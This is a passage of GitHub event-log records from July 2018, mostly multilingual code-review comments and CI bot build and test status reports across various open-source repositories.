{"id":"8046102922","type":"CommitCommentEvent","actor":{"login":"Daltimore"},"repo":{"name":"vueschool/vuejs-firebase-authentication"},"payload":{"comment":{"id":29909980,"position":null,"line":null,"path":null,"commit_id":"c79e9846b620b12cc08bfc2d7093b76703a7b7f3","created_at":"2018-07-31T19:11:17Z","updated_at":"2018-07-31T19:11:17Z","author_association":"NONE","body":"Yes Alex, I'd love to.\n\nOn Tue, Jul 31, 2018, 19:26 Alex Kyriakidis <notifications@github.com>\nwrote:\n\n> @Daltimore <https://github.com/Daltimore> nice catch! Want to submit a PR?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vueschool/vuejs-firebase-authentication/commit/c79e9846b620b12cc08bfc2d7093b76703a7b7f3#commitcomment-29909229>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARnO_brcvomwSmAoVMkZyA6WjNvBV--Nks5uMKFIgaJpZM4VoEIn>\n> .\n>\n"}},"created_at":"2018-07-31T19:11:17Z"}
{"id":"8046103165","type":"CommitCommentEvent","actor":{"login":"ferm10n"},"repo":{"name":"avil13/vue-sweetalert2"},"payload":{"comment":{"id":29909981,"position":13,"line":12,"path":"src/index.js","commit_id":"23c09927110939ce3a6d17cbcfc0e8115707a32d","created_at":"2018-07-31T19:11:19Z","updated_at":"2018-07-31T19:11:19Z","author_association":"NONE","body":"If you have a component that uses something like `this.$swal(ops).then(...)` then that would fail in a testing environment!\r\nWhy did you want to prevent it from being used in a node environment?"}},"created_at":"2018-07-31T19:11:19Z"}
{"id":"8046105139","type":"CommitCommentEvent","actor":{"login":"carver"},"repo":{"name":"cburgdorf/py-evm"},"payload":{"comment":{"id":29909984,"position":16,"line":188,"path":"eth/vm/logic/arithmetic.py","commit_id":"46f7a9d9a38318c484cb14dd80a66aba766c0186","created_at":"2018-07-31T19:11:43Z","updated_at":"2018-07-31T19:11:43Z","author_association":"NONE","body":"Oh yeah, had an off-by-one error: `result % (UINT256_MAX + 1)` should do it as well. But I suspect `& UINT_256_MAX` is faster (and maybe even easier to read). Which appears to be correct:\r\n\r\n```\r\nIn [23]: %timeit result % (UINT_256_MAX + 1)\r\n158 ns ± 2.16 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)\r\n\r\nIn [24]: %timeit result & UINT_256_MAX\r\n58.7 ns ± 3.46 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)\r\n```"}},"created_at":"2018-07-31T19:11:43Z"}
{"id":"8046106466","type":"CommitCommentEvent","actor":{"login":"marktsuchida"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29909985,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-31T19:11:59Z","updated_at":"2018-07-31T19:11:59Z","author_association":"MEMBER","body":"@lukas-lang Thanks for the suggestions! It's hard to tell how many people would be affected if I rewrite history on 'master', but I think in this case I'd like to avoid it, as it's been > 1 week. A two-way sync would also be interesting, but we want to drop the SVN repo entirely going forward.\r\n\r\nI think I'll take this as an excuse to go ahead with completing the SVN->Git migration, which is long overdue anyway. I need to think things through a little bit, but will make further announcements on the mailing list."}},"created_at":"2018-07-31T19:11:59Z"}
{"id":"8046110728","type":"CommitCommentEvent","actor":{"login":"JNSchwartz"},"repo":{"name":"PandarinDev/VulcanDojo"},"payload":{"comment":{"id":29909993,"position":null,"line":null,"path":null,"commit_id":"1a84e992d3eeb6e560002654fbd69299c80b4bb1","created_at":"2018-07-31T19:12:52Z","updated_at":"2018-07-31T19:12:52Z","author_association":"COLLABORATOR","body":"Great point following property naming convention. Could be applied on gamblers as well."}},"created_at":"2018-07-31T19:12:52Z"}
{"id":"8046112103","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29909996,"position":40,"line":40,"path":"homework9/Task1/task1.java","commit_id":"247a0a42e6d0c01d2224109ff9c1708c93747488","created_at":"2018-07-31T19:13:09Z","updated_at":"2018-07-31T19:13:09Z","author_association":"OWNER","body":"тут, в методі, краще викидати ексепшин і передавати його на гору через сигнатуру методу"}},"created_at":"2018-07-31T19:13:09Z"}
{"id":"8046113818","type":"CommitCommentEvent","actor":{"login":"kodiak762"},"repo":{"name":"kodiak762/website"},"payload":{"comment":{"id":29909999,"position":null,"line":null,"path":null,"commit_id":"361cc407bebb6a727ce670cd36c187df63bc439b","created_at":"2018-07-31T19:13:29Z","updated_at":"2018-07-31T19:13:29Z","author_association":"OWNER","body":"### Lipsum Really?\r\n\r\nLeaving comments just because..."}},"created_at":"2018-07-31T19:13:29Z"}
{"id":"8046116985","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29910007,"position":null,"line":null,"path":null,"commit_id":"400978f8b574d4da01ef9c84eda67faf5cda22a6","created_at":"2018-07-31T19:14:09Z","updated_at":"2018-07-31T19:14:09Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-22](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-22-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T19:14:09Z"}
{"id":"8046117520","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910011,"position":1,"line":6,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:14:15Z","updated_at":"2018-07-31T19:14:15Z","author_association":"OWNER","body":"Окей, исправлю\r\n"}},"created_at":"2018-07-31T19:14:15Z"}
{"id":"8046121180","type":"CommitCommentEvent","actor":{"login":"vipwow1990"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29910024,"position":null,"line":null,"path":null,"commit_id":"20452e2d2a2a00634c18cc0199a8b8c2fd1182a4","created_at":"2018-07-31T19:14:58Z","updated_at":"2018-07-31T19:14:58Z","author_association":"NONE","body":"This spell causes the server to crash\r\nhttp://www.wowhead.com/spell=207684/sigil-of-musery\r\nHow can this be remedied?\r\n\r\nAnd here the server crash: https://yadi.sk/d/wu7z14rW3ZmcvJ download please and tell me how I can fix it"}},"created_at":"2018-07-31T19:14:58Z"}
{"id":"8046125869","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29910047,"position":36,"line":36,"path":"Homework_9/Main.java","commit_id":"c9689c30ac81a6033d9ce4868cf2f4361db49409","created_at":"2018-07-31T19:15:53Z","updated_at":"2018-07-31T19:15:53Z","author_association":"OWNER","body":"тут краще ексепшин викидати і передавати на гору "}},"created_at":"2018-07-31T19:15:53Z"}
{"id":"8046131026","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910057,"position":16,"line":14,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:16:53Z","updated_at":"2018-07-31T19:16:53Z","author_association":"OWNER","body":"Благодарю за подсказку."}},"created_at":"2018-07-31T19:16:53Z"}
{"id":"8046169923","type":"CommitCommentEvent","actor":{"login":"cpeel"},"repo":{"name":"DistributedProofreaders/dproofreaders"},"payload":{"comment":{"id":29910178,"position":null,"line":null,"path":null,"commit_id":"3b83a82c99ccd241c5dee7a234ad437268648928","created_at":"2018-07-31T19:24:39Z","updated_at":"2018-07-31T19:24:39Z","author_association":"MEMBER","body":"Please remove the commented-out lines in `pinc/site_news.inc` too as part of this commit."}},"created_at":"2018-07-31T19:24:39Z"}
{"id":"8046170085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29910179,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T19:24:41Z","updated_at":"2018-07-31T19:24:41Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2337 of 2337 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-31T19:24:41Z"}
{"id":"8046171910","type":"CommitCommentEvent","actor":{"login":"eitanavgil"},"repo":{"name":"kaltura/mwEmbed"},"payload":{"comment":{"id":29910186,"position":null,"line":null,"path":null,"commit_id":"a619d28da9286347e511e256ca88f551a8a7a59c","created_at":"2018-07-31T19:25:05Z","updated_at":"2018-07-31T19:25:05Z","author_association":"CONTRIBUTOR","body":"@OrenMe \r\ndid we intended to merge this to 2.70? \r\n"}},"created_at":"2018-07-31T19:25:05Z"}
{"id":"8046173327","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29910188,"position":40,"line":54,"path":"tests/TicTacToeTest.php","commit_id":"9021613e442df8ed09d88171cb77476ee7d35c41","created_at":"2018-07-31T19:25:21Z","updated_at":"2018-07-31T19:25:21Z","author_association":"NONE","body":"Here you must use `Mark::SYMBOL_` constants. Nowhere in the code you're allowed to use 'X' or '0' except in the `Mark` class."}},"created_at":"2018-07-31T19:25:21Z"}
{"id":"8046174494","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29910190,"position":18,"line":23,"path":"tests/TicTacToeTest.php","commit_id":"9021613e442df8ed09d88171cb77476ee7d35c41","created_at":"2018-07-31T19:25:36Z","updated_at":"2018-07-31T19:25:36Z","author_association":"NONE","body":"Here you must use `Mark::SYMBOL_` constants. Nowhere in the code you're allowed to use 'X' or '0' except in the `Mark` class."}},"created_at":"2018-07-31T19:25:36Z"}
{"id":"8046180479","type":"CommitCommentEvent","actor":{"login":"OrenMe"},"repo":{"name":"kaltura/mwEmbed"},"payload":{"comment":{"id":29910209,"position":null,"line":null,"path":null,"commit_id":"a619d28da9286347e511e256ca88f551a8a7a59c","created_at":"2018-07-31T19:26:46Z","updated_at":"2018-07-31T19:26:46Z","author_association":"COLLABORATOR","body":"No, by accident. cherry-picked ti 2.71"}},"created_at":"2018-07-31T19:26:46Z"}
{"id":"8046180482","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29910210,"position":null,"line":null,"path":null,"commit_id":"34a0f8f3430d7061c304a7882904b6b8a69abd20","created_at":"2018-07-31T19:26:46Z","updated_at":"2018-07-31T19:26:46Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a0f8f3430d7061c304a7882904b6b8a69abd20-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T19:26:46Z"}
{"id":"8046184204","type":"CommitCommentEvent","actor":{"login":"omiroshn"},"repo":{"name":"CoZZmOnAvT/socket_chat"},"payload":{"comment":{"id":29910221,"position":null,"line":null,"path":null,"commit_id":"99aff464b77e94ecbd5a80d72dcf19ec34ac721e","created_at":"2018-07-31T19:27:31Z","updated_at":"2018-07-31T19:27:31Z","author_association":"NONE","body":"какашка"}},"created_at":"2018-07-31T19:27:31Z"}
{"id":"8046185681","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29910225,"position":null,"line":null,"path":null,"commit_id":"17fdbe8b8e6668f09b273a95a32c39643edd77b4","created_at":"2018-07-31T19:27:50Z","updated_at":"2018-07-31T19:27:50Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#pr-3](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T19:27:50Z"}
{"id":"8046188739","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910232,"position":78,"line":50,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:28:26Z","updated_at":"2018-07-31T19:28:26Z","author_association":"OWNER","body":"\r\n![1f618](https://user-images.githubusercontent.com/31315447/43482319-06e8be94-9511-11e8-9be5-b45fe3e830cb.png)\r\n"}},"created_at":"2018-07-31T19:28:26Z"}
{"id":"8046190939","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29910236,"position":168,"line":168,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T19:28:53Z","updated_at":"2018-07-31T19:28:53Z","author_association":"COLLABORATOR","body":"That is a good point! I think the syntax is there to give these annotations to declarations other than classes. We might ask Herb whether we should support that. "}},"created_at":"2018-07-31T19:28:53Z"}
{"id":"8046191284","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29910237,"position":null,"line":null,"path":null,"commit_id":"e7c04e5d337d9e3d9e260827276720249720b159","created_at":"2018-07-31T19:28:57Z","updated_at":"2018-07-31T19:28:57Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/f235ceb4-f278-4ad8-b520-1b95239a4ea6\n"}},"created_at":"2018-07-31T19:28:57Z"}
{"id":"8046193237","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910243,"position":null,"line":null,"path":null,"commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:29:21Z","updated_at":"2018-07-31T19:29:21Z","author_association":"NONE","body":"И да, зачем ты везде пишешь .get('var'), а не просто ['var']?"}},"created_at":"2018-07-31T19:29:21Z"}
{"id":"8046193904","type":"CommitCommentEvent","actor":{"login":"awjuliani"},"repo":{"name":"Unity-Technologies/ml-agents"},"payload":{"comment":{"id":29910244,"position":17,"line":106,"path":"unity-environment/Assets/ML-Agents/Editor/BrainEditor.cs","commit_id":"3e7d6273cb5df8b7ef4fea74cc8c0aa3b0e45f6e","created_at":"2018-07-31T19:29:29Z","updated_at":"2018-07-31T19:29:29Z","author_association":"COLLABORATOR","body":"These should not be called bins, since \"bins\" only applies breaking continuous control down."}},"created_at":"2018-07-31T19:29:29Z"}
{"id":"8046195965","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29910248,"position":6,"line":17,"path":"client/src/ApiRequests.js","commit_id":"f4ccf9cb5515e51e1d29713b27f363e65aa98977","created_at":"2018-07-31T19:29:55Z","updated_at":"2018-07-31T19:29:55Z","author_association":"COLLABORATOR","body":"Esse código aqui está duplicado entre os dois `fetch`, extrair em um único código para tratar geral esse mecanismo."}},"created_at":"2018-07-31T19:29:55Z"}
{"id":"8046198678","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29910262,"position":null,"line":null,"path":null,"commit_id":"e21110903ba5672b03fc4cff1d965c54057c79a9","created_at":"2018-07-31T19:30:27Z","updated_at":"2018-07-31T19:30:27Z","author_association":"COLLABORATOR","body":"- New action types: `OVERLAY_SET_WIDGET_SIZE`, `ACTIVITY_INVITE_MODAL_OPEN`, `ACTIVITY_INVITE_MODAL_QUERY`, `ACTIVITY_INVITE_MODAL_SEND`, `ACTIVITY_INVITE_MODAL_CLOSE`\r\n- New overlay widget: `ACTIVITY_INVITE`\r\n- New RPC command: `OPEN_OVERLAY_ACTIVITY_INVITE:`\r\n\r\n## New strings\r\n- `ACTIVITY_INVITE_MODAL_HEADER: \"Invite to Play !!{name}!!\"`\r\n- `ACTIVITY_INVITE_MODAL_SEARCH_PLACEHOLDER: \"Search users and channels\"`\r\n- `ACTIVITY_INVITE_MODAL_SENT: \"Sent\"`\r\n- `ACTIVITY_INVITE_MODAL_INVITE: \"Invite\"`\r\n- `ACTIVITY_INVITE_MODAL_RETURN_TO_GAME: \"Return to Game\"`"}},"created_at":"2018-07-31T19:30:27Z"}
{"id":"8046199794","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29910267,"position":null,"line":null,"path":null,"commit_id":"56ca65e44ae816fe2f738c08e3bfc4870989960c","created_at":"2018-07-31T19:30:42Z","updated_at":"2018-07-31T19:30:42Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-26](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-26).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-26-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T19:30:42Z"}
{"id":"8046205648","type":"CommitCommentEvent","actor":{"login":"klarycantone"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29910281,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T19:31:54Z","updated_at":"2018-07-31T19:31:54Z","author_association":"NONE","body":"\n\nI tried to implement the city following the example of the country but it does not give me anything. I have read the documentation but I can not. Please you have some code to give me I'm stuck. Thank you\n--\nInviato da Libero Mail per Android Martedì, 31 Luglio 2018, 09:11PM +02:00 da Hans Erik  notifications@github.com :\n\n>If you read the documentation for the places autocomplete api, there are ways to restrict results to a particular location and radius or, alternatively, to within a country:. This my code show how to restrict to a country(s). Read the docs especially about radius, if you know the radius of the city you can limit to that city..\n>read:\n>https://developers.google.com/places/web-service/autocomplete\n>—\n>You are receiving this because you commented.\n>Reply to this email directly,  view it on GitHub , or  mute the thread ."}},"created_at":"2018-07-31T19:31:54Z"}
{"id":"8046206888","type":"CommitCommentEvent","actor":{"login":"AndrewNicolls"},"repo":{"name":"AndrewNicolls/SoftwareProjectYear2"},"payload":{"comment":{"id":29910288,"position":null,"line":null,"path":null,"commit_id":"0dce478eda558a802c5e35b662d1163b61aeddb7","created_at":"2018-07-31T19:32:10Z","updated_at":"2018-07-31T19:32:10Z","author_association":"OWNER","body":"Need to figure out how to connect this frame to the next ones, with the new ones replacing the old one. Such as when selecting New Student and pressing the OK button, the New Student frame replaces the greet frame."}},"created_at":"2018-07-31T19:32:10Z"}
{"id":"8046208524","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29910291,"position":196,"line":196,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T19:32:30Z","updated_at":"2018-07-31T19:32:30Z","author_association":"COLLABORATOR","body":"I do not really know how to tell containers from ranges but the way I think about it: containers are ranges that owns their elements. Ranges in general, like `basic_string_view` might not own their elements."}},"created_at":"2018-07-31T19:32:30Z"}
{"id":"8046211371","type":"CommitCommentEvent","actor":{"login":"gildeluermoz"},"repo":{"name":"PnX-SI/GeoNature"},"payload":{"comment":{"id":29910299,"position":null,"line":null,"path":null,"commit_id":"f124d81e766b0bdd2700a2d514429e12c3dce5c9","created_at":"2018-07-31T19:33:06Z","updated_at":"2018-07-31T19:33:06Z","author_association":"CONTRIBUTOR","body":"En marge du sujet, on n'a jamais abordé l'idée et c'est peut-être trop lourd, mais pourquoi pas envisager de stocker en dur le cruved pour toutes les obs en synthèse ou dans occtax.\nBcp d'observateurs x 6 x bcp d'observations ça fait bcp de ligne mais le calculer à chaque requête c'est lourd aussi.\n\nÀ discuter, évaluer, creuser ..."}},"created_at":"2018-07-31T19:33:06Z"}
{"id":"8046213393","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29910307,"position":null,"line":null,"path":null,"commit_id":"787040df8f6cc7174be79347b1ff27281b9e07d0","created_at":"2018-07-31T19:33:30Z","updated_at":"2018-07-31T19:33:30Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-127](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-127).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-127-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-31T19:33:30Z"}
{"id":"8046213484","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29910309,"position":196,"line":196,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T19:33:32Z","updated_at":"2018-07-31T19:33:32Z","author_association":"COLLABORATOR","body":"If telling the ranges from containers is not working properly, we can hardcode these categories for standard library types for now and figure out how to do it properly (and in a portable way) later on."}},"created_at":"2018-07-31T19:33:32Z"}
{"id":"8046215107","type":"CommitCommentEvent","actor":{"login":"dbjpanda"},"repo":{"name":"dbjpanda/commerce_instamojo"},"payload":{"comment":{"id":29910311,"position":11,"line":11,"path":"commerce_instamojo.info.yml","commit_id":"9959db2cd37e2747f16fc47bf28df9ab05a9e941","created_at":"2018-07-31T19:33:51Z","updated_at":"2018-07-31T19:33:51Z","author_association":"OWNER","body":"Need one space on line 11"}},"created_at":"2018-07-31T19:33:51Z"}
{"id":"8046215649","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29910314,"position":null,"line":null,"path":null,"commit_id":"84ce5c49c9f5d4615be745478e3bda36565038c5","created_at":"2018-07-31T19:33:57Z","updated_at":"2018-07-31T19:33:57Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/84ce5c49c9f5d4615be745478e3bda36565038c5/index.html"}},"created_at":"2018-07-31T19:33:57Z"}
{"id":"8046217536","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29910321,"position":251,"line":251,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T19:34:21Z","updated_at":"2018-07-31T19:34:21Z","author_association":"COLLABORATOR","body":"Great! Let us know if you have any questions or would like to have a skype meeting or anything else."}},"created_at":"2018-07-31T19:34:21Z"}
{"id":"8046218049","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29910323,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T19:34:27Z","updated_at":"2018-07-31T19:34:27Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2959 of 2959 tests passed, 624 test warnings)\n\nMessages:\n\n * 624 tests had: EIO diffs.\n * 545 tests had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T19:34:27Z"}
{"id":"8046219830","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29910330,"position":25,"line":25,"path":"lesson.py","commit_id":"1ae3621500ec8986e65e1924027838e80c8552da","created_at":"2018-07-31T19:34:49Z","updated_at":"2018-07-31T19:34:49Z","author_association":"NONE","body":"Генератором списков сделай"}},"created_at":"2018-07-31T19:34:49Z"}
{"id":"8046222847","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29910339,"position":null,"line":null,"path":null,"commit_id":"533e7892cc3502ea60ff22c93a9327b7da8e3b78","created_at":"2018-07-31T19:35:27Z","updated_at":"2018-07-31T19:35:27Z","author_association":"MEMBER","body":"it was 2 days without sleep im sowwy :( pls no hit"}},"created_at":"2018-07-31T19:35:27Z"}
{"id":"8046226344","type":"CommitCommentEvent","actor":{"login":"ToppleKek"},"repo":{"name":"ToppleKek/banter"},"payload":{"comment":{"id":29910344,"position":null,"line":null,"path":null,"commit_id":"816db8eea00be1e2abd0636ed2bbac111f353008","created_at":"2018-07-31T19:36:08Z","updated_at":"2018-07-31T19:36:08Z","author_association":"OWNER","body":"parsing*"}},"created_at":"2018-07-31T19:36:08Z"}
{"id":"8046226552","type":"CommitCommentEvent","actor":{"login":"erikswed"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29910346,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T19:36:10Z","updated_at":"2018-07-31T19:36:10Z","author_association":"OWNER","body":"I give you plentiful of help here and you still want me to write your code"}},"created_at":"2018-07-31T19:36:10Z"}
{"id":"8046228247","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"bitzenyPlus/BitZenyPlus"},"payload":{"comment":{"id":29910349,"position":3,"line":3,"path":"src/qt/bitcoin_locale.qrc","commit_id":"b485413613b00313fa1f5ab0e114fb971fbc9c27","created_at":"2018-07-31T19:36:29Z","updated_at":"2018-07-31T19:36:29Z","author_association":"MEMBER","body":"i think removed too much... can we restore some languages?"}},"created_at":"2018-07-31T19:36:29Z"}
{"id":"8046231935","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29910362,"position":null,"line":null,"path":null,"commit_id":"35aaef01b4a8bf0b584790b825fbce0a8e4507ba","created_at":"2018-07-31T19:37:15Z","updated_at":"2018-07-31T19:37:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-590](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-590).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-590-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T19:37:15Z"}
{"id":"8046232738","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29910365,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T19:37:24Z","updated_at":"2018-07-31T19:37:24Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2957 of 2957 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a 